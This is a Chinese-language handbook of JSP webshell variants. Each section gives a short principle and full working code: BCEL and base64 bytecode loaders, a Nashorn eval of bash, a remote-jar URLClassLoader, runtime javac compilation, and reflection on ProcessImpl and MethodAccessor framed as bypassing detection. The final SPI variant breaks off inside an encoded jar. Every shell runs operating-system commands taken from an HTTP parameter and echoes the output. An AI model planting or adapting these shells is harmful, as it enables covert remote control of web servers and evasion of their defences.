都0202年了老嗨还在用的 - 各种姿势jsp webshell
字数 999 2025-08-20 18:18:17
JSP Webshell 高级利用技术手册
一、BCEL字节码Webshell
1. 核心原理
- 利用
com.sun.org.apache.bcel.internal.util.ClassLoader加载BCEL格式字节码 - BCEL字节码格式前缀为`
\[BCEL \]
`
2. 实现代码
<%@ page import="com.sun.org.apache.bcel.internal.util.ClassLoader" %>
<%
String bcelCode = "
$$
BCEL
$$
$l$8b$I$A$A$A$A$A$A$A$85U$5bW$hU$U$fe$86$ML$Y$a6$40$93r$d5$e2$8d$dap$ebh$eb$a5$96$8a6$I$V$N$X$81$82$Uo$93$c9$n$M$9d$cc$c4$c9$a4$82w$fd$N$fe$H_$adKC$97$b8$7c$f4$c1G$7f$86$bf$c1e$fd$ce$q$40b$c2$f2a$ce$99$b3$f7$9e$bd$bf$fd$ed$bd$cf$fc$f1$cf$_$bf$Bx$B$df$ea$Y$c6$8c$86$d7t$b4$c9$fdu$N$b7t$a41$x$977t$cca$5eG$3bn$ebP$f1$a6$5c$W$a4$e1$5bq$bc$z$f7L$tz$b1$a8aI$c72V$e2xG$c7$w$d6t$ac$e3$8e$5c6tl$e2$ddNl$e1n$i$db$3a$de$c3$fb$g$3eP$Q$LDIA$o$b3g$dd$b7L$d7$f2$f2$e6Z$Y8$5e$7eZA$c7M$c7s$c2$Z$F$7d$a9f$f5$d8$86$Cu$d6$cf$J$F$3d$Z$c7$TK$e5BV$E$ebV$d6$V$d2$9do$5b$ee$86$V8$f2$5c$T$aa$e1$ae$c3P$X2$eb$bb$81$Q$b9$e0$9aU$d8$U$d9$b5$5d$e1$ba$M$W$b3$L9$F$e7J$91$f7t$d9qs$oP0$d4$U$b8$a6$e2$X$dd$d9$f2$ce$8e$IDnUX$91$f1$60$d5$d8$f1$cdt$83$86$b6$aaK$88t$bf$WZ$f6$bdE$ab$YA$oW$g$3e$q$df$a4Z$81$3e$b7o$8bb$e8$f8$5eI$c3G$K$e2$a1_$8dH$c8$a9$b1V$fc$a8$F$cb$f1$U$f4$a7$b6$cf$a0$c7$K$f2L8$d9B$ad$a0$cb$f1$8a$e5$90Ga$V$c8$f0$J$f4$85S1$ad$da$b3$H$a1$acO$dbv$9a$fe$ec$88n$7d$cd$_$H$b6$98w$q$a9$D$cdd$5e$91$ae$M$5c$84E$f5$Z$f4$Ruk$aeHy$L$qU$9d$86$ac$B$h9$D$C$3b$g$f2$Gv$e1$c8$40$7br$b9g$c0$c5U$D$F$90$TE7$f0$bc$3c$3d$86$c7$d9$O$cd$m5$f8$G$8a$f8$98Uk$91$81$edZ$rV$n0PB$a8$a1l$e0$3e$3e1$b0$8f$D$N$9f$g$f8$M$9fk$f8$c2$c0$97$f8$8au$g$jM$cf$ceeFG5$7cm$e0$h$8c$u$e8$3d$cdz9$bb$t$ec$b0At$5c$d5$e4I$a2$cb$t$a5g$l$a6d$e9$ce$9f$9a$af$96$bd$d0$vH$de$f3$o$3c9$f45$b4DM$y$7bB$ec$L$5b$c1$e5V$TS$tZ$J$7c$5b$94J$d3$N$91jBv6$p$z$d4$b7$c7$c0q$b4$a6$G$ZL$b5T$c8$i$92$a7$aa$da$iHi$9c$fa$5c$s$9a$86$O$abX$U$k$a7n$ea$7f$d0$few$f2zNU$b3$b2RU$c4$d1k$c6$afuQ$D$3fu$w$7e$de$d7RA$c0$92$60Q$8a$ba$fbV$e98$f7$b1$b3$c15$b1$91l$nV$d0I$a1$e3V$_$n$96w$81U$92$qp$baR$dbiy$bcj$fb$F$b3T$f6L$3f$c8$9bV$d1$b2w$85$99$b5$85k$3a$5e$u$C$cfr$cd$a8$nw8q$e6$9d$d0q$9d$f0$80$ec$J$af$3a$8f$D$f4r$b7$e5$FQ$dft$H$a5P$QK$cc$_$87$f5$e3$beB$d3$W$f8$eb$c4$K$b4$a2$3c$b9$k$9e$e2$N$3f$cc_$85$c2$87$83$c55$c6$f7$8b$Y$e1$f5$ff$EO$7f$a2$83$ff$H$e0$f6$f8$n$94$p$b4m$j$o$b6x$Eu$eb$I$ed$5b$P$d11Q$81VA$fc$Q$9d$87$d0$97$a6$w$e8$da$ba$a1$fe$8e$c4$e4$90Z$81$918$c7e$f3$fbG$7f$8dOV$d0$fd3z$kD$B$9e$e4$3a$C$8dk7$7f9$3d0$I$e2$S$S0$91$c4$M$fa0$8f$7e$C$93$ff$af$u4$9e$c63$40$f46J$88$K$ed$a7i$ff$y$n$5e$a2$ee2R$f49I$f8c$d4$aa$Y$8fRi$7bD$a5$aaaB$c3$a4$86$v$NW$80$bf1$c8$T$c3$80f$K$9e$e3$c3$h$85$ab$cc$d4$e4
$$
Yh$l$ff$J$3d$3f$f0$a5$z$c2$d9$R$J$87$p$3cF$d5$a0$86$a7$T$d7$88$b0J$d3wD$a0r$bf$9e$e8$ad$e0$7c$oQA2Cj
$$
$fc$g_$9c$60$ea$7d$9b$93$eaC$f4$_$fd$88$81$g$87$89A2C$ba$M$f2R$c1$d0$83$93x$c3$8c$u$d9$e9$a2$df$E$r$83$8c$3c$c2$88$_3$a6$c40$5e$8d$83$X$f1$S$f7
$$
LQs$9d$b8$S$e4$e3$V$dc$a0$97$R$fa$98$s$T$b1$86DoF$R$5e$fd$X$cb$B$rU$g$I$A$A";
response.getOutputStream().write(String.valueOf(new ClassLoader().loadClass(bcelCode).getConstructor(String.class).newInstance(request.getParameter("threedr3am")).toString()).getBytes());
%>
3. 恶意类生成
import com.sun.org.apache.bcel.internal.classfile.Utility;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
public class Threedr3am {
String res;
public Threedr3am(String cmd) throws IOException {
StringBuilder stringBuilder = new StringBuilder();
BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));
String line;
while((line = bufferedReader.readLine()) != null) {
stringBuilder.append(line).append("\n");
}
res = stringBuilder.toString();
}
@Override
public String toString() {
return res;
}
public static void main(String[] args) throws IOException {
InputStream inputStream = Threedr3am_15.class.getClassLoader().getResourceAsStream("Threedr3am.class");
byte[] bytes = new byte[inputStream.available()];
inputStream.read(bytes);
String code = Utility.encode(bytes, true);
System.out.println("
$$
BCEL
$$
" + code);
}
}
二、自定义类加载器Webshell
1. 核心原理
- 重写
loadClass和findClass方法 - 使用Base64编码的字节码直接加载
2. 实现代码
<%@ page import="java.security.PermissionCollection" %>
<%@ page import="java.security.Permissions" %>
<%@ page import="java.security.AllPermission" %>
<%@ page import="java.security.ProtectionDomain" %>
<%@ page import="java.security.CodeSource" %>
<%@ page import="java.security.cert.Certificate" %>
<%@ page import="java.util.Base64" %>
<%
response.getOutputStream().write(new ClassLoader() {
@Override
public Class<?> loadClass(String name) throws ClassNotFoundException {
if (name.contains("Threedr3am_2")) {
return findClass(name);
}
return super.loadClass(name);
}
@Override
protected Class<?> findClass(String name) throws ClassNotFoundException {
try {
byte[] bytes = Base64.getDecoder().decode("yv66vgAAADQAiAoAGgA+BwA/CgACAD4HAEAHAEEKAEIAQwoAQgBECgBFAEYKAAUARwoABABICgAEAEkKAAIASggASwoAAgBMCQAQAE0HAE4KAE8AUAgAUQoAUgBTCgBUAFUKAFQAVgoAVwBYCgBZAFoJAFsAXAoAXQBeBwBfAQADcmVzAQASTGphdmEvbGFuZy9TdHJpbmc7AQAGPGluaXQ+AQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAA5MVGhyZWVkcjNhbV8yOwEAA2NtZAEADXN0cmluZ0J1aWxkZXIBABlMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7AQAOYnVmZmVyZWRSZWFkZXIBABhMamF2YS9pby9CdWZmZXJlZFJlYWRlcjsBAARsaW5lAQANU3RhY2tNYXBUYWJsZQcATgcAYAcAPwcAQAEACkV4Y2VwdGlvbnMHAGEBAAh0b1N0cmluZwEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAC2lucHV0U3RyZWFtAQAVTGphdmEvaW8vSW5wdXRTdHJlYW07AQAFYnl0ZXMBAAJbQgEABGNvZGUBAApTb3VyY2VGaWxlAQARVGhyZWVkcjNhbV8yLmphdmEMAB0AYgEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyAQAWamF2YS9pby9CdWZmZXJlZFJlYWRlcgEAGWphdmEvaW8vSW5wdXRTdHJlYW1SZWFkZXIHAGMMAGQAZQwAZgBnBwBoDABpAGoMAB0AawwAHQBsDABtADIMAG4AbwEAAQoMADEAMgwAGwAcAQAMVGhyZWVkcjNhbV8yBwBwDABxAHIBABJUaHJlZWRyM2FtXzIuY2xhc3MHAHMMAHQAdQcAdgwAdwB4DAB5AHoHAHsMAHwAfwcAgAwAgQCCBwCDDACEAIUHAIYMAIcAHgEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQATamF2YS9pby9JT0V4Y2VwdGlvbgEAAygpVgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYBABMoTGphdmEvaW8vUmVhZGVyOylWAQAIcmVhZExpbmUBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAA9qYXZhL2xhbmcvQ2xhc3MBAA5nZXRDbGFzc0xvYWRlcgEAGSgpTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBABVqYXZhL2xhbmcvQ2xhc3NMb2FkZXIBABNnZXRSZXNvdXJjZUFzU3RyZWFtAQApKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9pby9JbnB1dFN0cmVhbTsBABNqYXZhL2lvL0lucHV0U3RyZWFtAQAJYXZhaWxhYmxlAQADKClJAQAEcmVhZAEABShbQilJAQAQamF2YS91dGlsL0Jhc2U2NAEACmdldEVuY29kZXIBAAdFbmNvZGVyAQAMSW5uZXJDbGFzc2VzAQAcKClMamF2YS91dGlsL0Jhc2U2NCRFbmNvZGVyOwEAGGphdmEvdXRpbC9CYXNlNjQkRW5jb2RlcgEADmVuY29kZVRvU3RyaW5nAQAWKFtCKUxqYXZhL2xhbmcvU3RyaW5nOwEAEGphdmEvbGFuZy9TeXN0ZW0BAANvdXQBABVMamF2YS9pby9QcmludFN0cmVhbTsBABNqYXZhL2lvL1ByaW50U3RyZWFtAQAHcHJpbnRsbgAhABAAGgAAAAEAAAAbABwAAAADAAEAHQAeAAIAHwAAANIABgAFAAAARyq3AAG7AAJZtwADTbsABFm7AAVZuAAGK7YAB7YACLcACbcACk4ttgALWToExgASLBkEtgAMEg22AAxXp//qKiy2AA61AA+xAAAAAwAgAAAAHgAHAAAADgAEAA8ADAAQACUAEgAvABMAPgAVAEYAFgAhAAAANAAFAAAARwAiACMAAAAAAEcAJAAcAAEADAA7ACUAJgACACUAIgAnACgAAwAsABsAKQAcAAQAKgAAABsAAv8AJQAEBwArBwAsBwAtBwAuAAD8ABgHACwALwAAAAQAAQAwAAEAMQAyAAEAHwAAAC8AAQABAAAABSq0AA+wAAAAAgAgAAAABgABAAAAGgAhAAAADAABAAAABQAiACMAAAAJADMANAACAB8AAACEAAIABAAAACgSELYAERIStgATTCu2ABS8CE0rLLYAFVe4ABYstgAXTrIAGC22ABmxAAAAAgAgAAAAGgAGAAAAHgALAB8AEgAgABgAIQAgACIAJwAjACEAAAAqAAQAAAAoADUANgAAAAsAHQA3ADgAAQASABYAOQA6AAIAIAAIADsAHAADAC8AAAAEAAEAMAACADwAAAACAD0AfgAAAAoAAQBZAFcAfQAJ");
PermissionCollection pc = new Permissions();
pc.add(new AllPermission());
ProtectionDomain protectionDomain = new ProtectionDomain(new CodeSource(null, (Certificate[]) null), pc, this, null);
return this.defineClass(name, bytes, 0, bytes.length, protectionDomain);
} catch (Exception e) {
e.printStackTrace();
}
return super.findClass(name);
}
}.loadClass("Threedr3am_2").getConstructor(String.class).newInstance(request.getParameter("threedr3am")).toString().getBytes());
%>
三、ScriptEngine.eval Webshell
1. 核心原理
- 使用JDK自带的
ScriptEngine执行脚本 - 通过Nashorn引擎执行JavaScript代码
2. 实现代码
<%@ page import="javax.script.ScriptEngineManager" %>
<%@ page import="java.util.Base64" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.io.InputStreamReader" %>
<%
String s1 = "s=[3];s[0]='/bin/bash';s[1]='-c';s[2]='";
String s2 = request.getParameter("threedr3am");
String s3 = new String(Base64.getDecoder().decode("JztqYXZhLmxhbmcuUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhzKTs="));
Process process = (Process) new ScriptEngineManager().getEngineByName("nashorn").eval(s1 + s2 + s3);
InputStream inputStream = process.getInputStream();
StringBuilder stringBuilder = new StringBuilder();
BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
String line;
while((line = bufferedReader.readLine()) != null) {
stringBuilder.append(line).append("\n");
}
if (stringBuilder.length() > 0) {
response.getOutputStream().write(stringBuilder.toString().getBytes());
}
%>
四、URLClassLoader加载远程jar
1. 核心原理
- 使用
URLClassLoader加载远程恶意jar - 通过
loadClass触发恶意代码执行
2. 实现代码
<%@ page import="java.net.URL" %>
<%@ page import="java.net.URLClassLoader" %>
<%
response.getOutputStream().write(new URLClassLoader(new URL[]{new URL("http://127.0.0.1:80/threedr3am.jar")}).loadClass("Threedr3am_4").getConstructor(String.class).newInstance(String.valueOf(request.getParameter("threedr3am"))).toString().getBytes());
%>
五、javac动态编译class
1. 核心原理
- 使用JDK自带的
javac动态编译class - 将Java源码写入临时文件并编译
- 通过
URLClassLoader加载编译后的class
2. 实现代码
<%@ page import="java.net.URL" %>
<%@ page import="java.net.URLClassLoader" %>
<%@ page import="java.nio.charset.Charset" %>
<%@ page import="java.nio.file.Files" %>
<%@ page import="java.nio.file.Paths" %>
<%@ page import="java.util.Locale" %>
<%@ page import="javax.tools.DiagnosticCollector" %>
<%@ page import="javax.tools.JavaCompiler" %>
<%@ page import="javax.tools.JavaFileObject" %>
<%@ page import="javax.tools.StandardJavaFileManager" %>
<%@ page import="javax.tools.ToolProvider" %>
<%@ page import="java.util.Random" %>
<%@ page import="java.io.File" %>
<%
String c = request.getParameter("threedr3am");
String tmpPath = Files.createTempDirectory("threedr3am").toFile().getPath();
JavaCompiler javaCompiler = ToolProvider.getSystemJavaCompiler();
DiagnosticCollector<JavaFileObject> diagnostics = new DiagnosticCollector();
StandardJavaFileManager standardJavaFileManager = javaCompiler
.getStandardFileManager(diagnostics, Locale.CHINA, Charset.forName("utf-8"));
int id = new Random().nextInt(10000000);
StringBuilder stringBuilder = new StringBuilder()
.append("import java.io.BufferedReader;\n")
.append("import java.io.IOException;\n")
.append("import java.io.InputStream;\n")
.append("import java.io.InputStreamReader;\n")
.append("public class Threedr3am" + id + " {\n")
.append(" public static String result = \"\";\n")
.append(" public Threedr3am" + id + "() throws Throwable {\n")
.append(" StringBuilder stringBuilder = new StringBuilder();\n")
.append(" try {")
.append(" BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\"" + c + "\").getInputStream()));\n")
.append(" String line;\n")
.append(" while((line = bufferedReader.readLine()) != null) {\n")
.append(" stringBuilder.append(line).append(\"\\n\");\n")
.append(" }\n")
.append(" result = stringBuilder.toString();\n")
.append(" } catch (Exception e) {\n")
.append(" e.printStackTrace();\n")
.append(" }\n")
.append(" throw new Throwable(stringBuilder.toString());")
.append(" }\n")
.append("}");
Files.write(Paths.get(tmpPath + File.separator + "Threedr3am" +id + ".java"), stringBuilder.toString().getBytes());
Iterable fileObject = standardJavaFileManager.getJavaFileObjects(tmpPath + File.separator + "Threedr3am" +id + ".java");
javaCompiler.getTask(null, standardJavaFileManager, diagnostics, null, null, fileObject).call();
try {
new URLClassLoader(new URL[]{new URL("file:" + tmpPath + File.separator)}).loadClass("Threedr3am" + id).newInstance();
} catch (Throwable e) {
response.getOutputStream().write(e.getMessage().getBytes());
}
%>
六、jdk.nashorn.internal.runtime.ScriptLoader
1. 核心原理
- 使用
jdk.nashorn.internal.runtime.ScriptLoader类加载器 - 通过反射调用
installClass方法加载字节码
2. 实现代码
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page import="java.lang.reflect.Method" %>
<%@ page import="java.security.CodeSource" %>
<%@ page import="java.security.cert.Certificate" %>
<%@ page import="java.util.Base64" %>
<%@ page import="jdk.nashorn.internal.runtime.Context" %>
<%@ page import="jdk.nashorn.internal.runtime.options.Options" %>
<%@ page import="java.lang.reflect.InvocationTargetException" %>
<%@ page import="sun.reflect.misc.MethodUtil" %>
<%
Class c = Class.forName("jdk.nashorn.internal.runtime.ScriptLoader");
final Constructor constructor = c.getDeclaredConstructor(Context.class);
constructor.setAccessible(true);
final Method m = c.getDeclaredMethod("installClass", String.class, byte[].class, CodeSource.class);
m.setAccessible(true);
class A {
B b;
final class B {
private Object o;
private Object[] oo;
public B() throws IllegalAccessException, InvocationTargetException, InstantiationException {
o = constructor.newInstance(new Context(new Options(""), null, null));
oo = new Object[]{"Threedr3am_6", Base64.getDecoder().decode("yv66vgAAADQAiAoAGgA+BwA/CgACAD4HAEAHAEEKAEIAQwoAQgBECgBFAEYKAAUARwoABABICgAEAEkKAAIASggASwoAAgBMCQAQAE0HAE4KAE8AUAgAUQoAUgBTCgBUAFUKAFQAVgoAVwBYCgBZAFoJAFsAXAoAXQBeBwBfAQADcmVzAQASTGphdmEvbGFuZy9TdHJpbmc7AQAGPGluaXQ+AQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAA5MVGhyZWVkcjNhbV82OwEAA2NtZAEADXN0cmluZ0J1aWxkZXIBABlMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7AQAOYnVmZmVyZWRSZWFkZXIBABhMamF2YS9pby9CdWZmZXJlZFJlYWRlcjsBAARsaW5lAQANU3RhY2tNYXBUYWJsZQcATgcAYAcAPwcAQAEACkV4Y2VwdGlvbnMHAGEBAAh0b1N0cmluZwEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAC2lucHV0U3RyZWFtAQAVTGphdmEvaW8vSW5wdXRTdHJlYW07AQAFYnl0ZXMBAAJbQgEABGNvZGUBAApTb3VyY2VGaWxlAQARVGhyZWVkcjNhbV82LmphdmEMAB0AYgEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyAQAWamF2YS9pby9CdWZmZXJlZFJlYWRlcgEAGWphdmEvaW8vSW5wdXRTdHJlYW1SZWFkZXIHAGMMAGQAZQwAZgBnBwBoDABpAGoMAB0AawwAHQBsDABtADIMAG4AbwEAAQoMADEAMgwAGwAcAQAMVGhyZWVkcjNhbV82BwBwDABxAHIBABJUaHJlZWRyM2FtXzYuY2xhc3MHAHMMAHQAdQcAdgwAdwB4DAB5AHoHAHsMAHwAfwcAgAwAgQCCBwCDDACEAIUHAIYMAIcAHgEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQATamF2YS9pby9JT0V4Y2VwdGlvbgEAAygpVgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9SdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYBABMoTGphdmEvaW8vUmVhZGVyOylWAQAIcmVhZExpbmUBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAA9qYXZhL2xhbmcvQ2xhc3MBAA5nZXRDbGFzc0xvYWRlcgEAGSgpTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBABVqYXZhL2xhbmcvQ2xhc3NMb2FkZXIBABNnZXRSZXNvdXJjZUFzU3RyZWFtAQApKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9pby9JbnB1dFN0cmVhbTsBABNqYXZhL2lvL0lucHV0U3RyZWFtAQAJYXZhaWxhYmxlAQADKClJAQAEcmVhZAEABShbQilJAQAQamF2YS91dGlsL0Jhc2U2NAEACmdldEVuY29kZXIBAAdFbmNvZGVyAQAMSW5uZXJDbGFzc2VzAQAcKClMamF2YS91dGlsL0Jhc2U2NCRFbmNvZGVyOwEAGGphdmEvdXRpbC9CYXNlNjQkRW5jb2RlcgEADmVuY29kZVRvU3RyaW5nAQAWKFtCKUxqYXZhL2xhbmcvU3RyaW5nOwEAEGphdmEvbGFuZy9TeXN0ZW0BAANvdXQBABVMamF2YS9pby9QcmludFN0cmVhbTsBABNqYXZhL2lvL1ByaW50U3RyZWFtAQAHcHJpbnRsbgAhABAAGgAAAAEAAAAbABwAAAADAAEAHQAeAAIAHwAAANIABgAFAAAARyq3AAG7AAJZtwADTbsABFm7AAVZuAAGK7YAB7YACLcACbcACk4ttgALWToExgASLBkEtgAMEg22AAxXp//qKiy2AA61AA+xAAAAAwAgAAAAHgAHAAAADgAEAA8ADAAQACUAEgAvABMAPgAVAEYAFgAhAAAANAAFAAAARwAiACMAAAAAAEcAJAAcAAEADAA7ACUAJgACACUAIgAnACgAAwAsABsAKQAcAAQAKgAAABsAAv8AJQAEBwArBwAsBwAtBwAuAAD8ABgHACwALwAAAAQAAQAwAAEAMQAyAAEAHwAAAC8AAQABAAAABSq0AA+wAAAAAgAgAAAABgABAAAAGgAhAAAADAABAAAABQAiACMAAAAJADMANAACAB8AAACEAAIABAAAACgSELYAERIStgATTCu2ABS8CE0rLLYAFVe4ABYstgAXTrIAGC22ABmxAAAAAgAgAAAAGgAGAAAAHgALAB8AEgAgABgAIQAgACIAJwAjACEAAAAqAAQAAAAoADUANgAAAAsAHQA3ADgAAQASABYAOQA6AAIAIAAIADsAHAADAC8AAAAEAAEAMAACADwAAAACAD0AfgAAAAoAAQBZAFcAfQAJ"), new CodeSource(null, (Certificate[]) null)};
}
}
public A() throws IllegalAccessException, InstantiationException, InvocationTargetException {
b = new B();
}
public Class invokex(Method method)
throws InvocationTargetException, IllegalAccessException {
return (Class) MethodUtil.invoke(method, b.o, b.oo);
}
}
Class target = new A().invokex(m);
response.getOutputStream().write(target.getConstructor(String.class).newInstance(request.getParameter("threedr3am")).toString().getBytes());
%>
七、ProcessImpl绕过检测
1. 核心原理
- 使用内部类绕过检测
- 通过反射调用
ProcessImpl.start方法
2. 实现代码
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.InputStreamReader" %>
<%@ page import="java.lang.reflect.InvocationTargetException" %>
<%@ page import="java.lang.reflect.Method" %>
<%@ page import="java.util.Map" %>
<%@ page import="sun.reflect.misc.MethodUtil" %>
<%
try {
final String s = request.getParameter("threedr3am");
class A {
B b;
final class B {
private Method o;
private Object oo;
private Object[] ooo;
public B() throws ClassNotFoundException, NoSuchMethodException {
Class clz = Class.forName("java.lang.ProcessImpl");
Method method = clz
.getDeclaredMethod("start", String[].class, Map.class, String.class,
ProcessBuilder.Redirect[].class, boolean.class);
method.setAccessible(true);
o = method;
oo = clz;
ooo = new Object[]{s.split(" "), null, null, null, false};
}
}
public A() throws ClassNotFoundException, NoSuchMethodException {
b = new B();
}
public Object invokex()
throws InvocationTargetException, IllegalAccessException {
return MethodUtil.invoke(b.o, b.oo, b.ooo);
}
}
Process process = (Process) new A().invokex();
InputStream inputStream = process.getInputStream();
StringBuilder stringBuilder = new StringBuilder();
BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
String line;
while ((line = bufferedReader.readLine()) != null) {
stringBuilder.append(line).append("\n");
}
if (stringBuilder.length() > 0) {
response.getOutputStream().write(stringBuilder.toString().getBytes());
}
} catch (Exception e) {
e.printStackTrace();
}
%>
八、ProcessBuilder绕过检测
1. 核心原理
- 使用内部类结构绕过检测
- 直接调用
ProcessBuilder执行命令
2. 实现代码
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.io.IOException" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.InputStreamReader" %>
<%
try {
final String cmd = request.getParameter("threedr3am");
class Threedr3am_8 {
Threedr3amX threedr3amX;
class Threedr3amX {
private Process process;
public Threedr3amX() throws IOException {
process = new ProcessBuilder().command(cmd.split(" ")).start();
}
}
public Threedr3am_8() throws IOException {
threedr3amX = new Threedr3amX();
}
public String echo() throws IOException {
Process process = threedr3amX.process;
InputStream inputStream = process.getInputStream();
StringBuilder stringBuilder = new StringBuilder();
BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
String line;
while ((line = bufferedReader.readLine()) != null) {
stringBuilder.append(line).append("\n");
}
return stringBuilder.toString();
}
}
response.getOutputStream().write(new Threedr3am_8().echo().getBytes());
} catch (Exception e) {
e.printStackTrace();
}
%>
九、MethodAccessor.invoke绕过
1. 核心原理
- 使用
MethodAccessor.invoke替代Method.invoke - 绕过对
Method.invoke的检测
2. 实现代码
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.io.InputStreamReader" %>
<%@ page import="java.lang.reflect.Method" %>
<%@ page import="java.util.Map" %>
<%@ page import="sun.reflect.ReflectionFactory" %>
<%@ page import="java.security.AccessController" %>
<%@ page import="sun.reflect.MethodAccessor" %>
<%
String s = request.getParameter("threedr3am");
Threedr3am_9.ooo = new Object[]{s.split(" "), null, null, null, false};
Method method = Threedr3am_9.clz.getDeclaredMethod("start", String[].class, Map.class, String.class, ProcessBuilder.Redirect[].class, boolean.class);
method.setAccessible(true);
ReflectionFactory reflectionFactory = AccessController.doPrivileged(new sun.reflect.ReflectionFactory.GetReflectionFactoryAction());
MethodAccessor methodAccessor = reflectionFactory.newMethodAccessor(method);
Process process = (Process) methodAccessor.invoke(null, null);
InputStream inputStream = process.getInputStream();
StringBuilder stringBuilder = new StringBuilder();
BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
String line;
while ((line = bufferedReader.readLine()) != null) {
stringBuilder.append(line).append("\n");
}
if (stringBuilder.length() > 0) {
response.getOutputStream().write(stringBuilder.toString().getBytes());
}
%>
十、SPI机制Webshell
1. 核心原理
- 利用Java SPI机制自动加载实例化
- 通过
ScriptEngineFactory接口实现恶意类
2. 实现代码
<%@ page import="java.net.URL" %>
<%@ page import="java.net.URLClassLoader" %>
<%@ page import="java.util.Random" %>
<%@ page import="java.io.File" %>
<%@ page import="java.nio.file.Files" %>
<%@ page import="java.nio.file.Paths" %>
<%@ page import="java.util.Base64" %>
<%@ page import="javax.script.ScriptEngineFactory" %>
<%@ page import="java.util.ServiceLoader" %>
<%@ page import="java.util.Iterator" %>
<%
String tmp = System.getProperty("java.io.tmpdir");
Random random = new Random();
String jarPath = tmp + File.separator + "cve-" + random.nextInt(1000000) + ".jar";
String inputFile = tmp + File.separator + "jabdhjabdjkandaldlanaklndkand.txt";
String s = request.getParameter("threedr3am");
if (Files.exists(Paths.get(inputFile)))
Files.delete(Paths.get(inputFile));
Files.write(Paths.get(inputFile), s.getBytes());
if (Files.exists(Paths.get(jarPath)))
Files.delete(Paths.get(jarPath));
Files.write(Paths.get(jarPath), Base64.getDecoder().decode("UEsDBBQACAgIAEFZtFAAAAAAAAAAAAAAAAAJAAQATUVUQS1JTkYv/soAAAMAUEsHCAAAAAACAAAAAAAAAFBLAwQUAAgICABBWbRQAAAAAAAAAAAAAAAAFAAAAE1FVEEtSU5GL01BTklGRVNULk1G803My0xLLS7RDUstKs7Mz7NSMNQz4OVyLkpNLElN0XWqBAlY6BnEGxoZKmj4FyUm56QqOOcXFeQXJZYA1WvycvFyAQBQSwcIEBGmIkQAAABFAAAAUEsDBAoAAAgAAEdYtFAAAAAAAAAAAAAAAAASAAAATUVUQS1JTkYvc2VydmljZXMvUEsDBBQACAgIAHWms1AAAAAAAAAAAAAAAAAyAAAATUVUQS1JTkYvc2VydmljZXMvamF2YXguc2NyaXB0LlNjcmlwdEVuZ2luZUZhY3RvcnkLyShKTU0pMk7MDU4uyiwo4QIAUEsHCLDG5KcTAAAAEQAAAFBLAwQUAAgICAA9WbRQAAAAAAAAAAAAAAAAFgAAAFRocmVlZHIzYW1TY3JpcHQuY2xhc3ONVttzE1UY/22TdtOwpSWlLUEuBRVSoK2CgrYVJYUikFKkpbUUhW32NN1ks4mbDaTiDbl4v4uKV7ziXcZx2g4d9c0Hxxl98MknX/0fHPE7u5u0abaXmeTsnvN9v993Od93zv7637WfANyGq37chBMiZD/KcMKHEX6M4YQPY3yiijjixygfqj6M+TCKMT/G+ET1YdyPBDQRSR8mMO7HJB7yQ4LhQwYPmX40uTjrx0mcEpETMeZHHU77sRxn+PA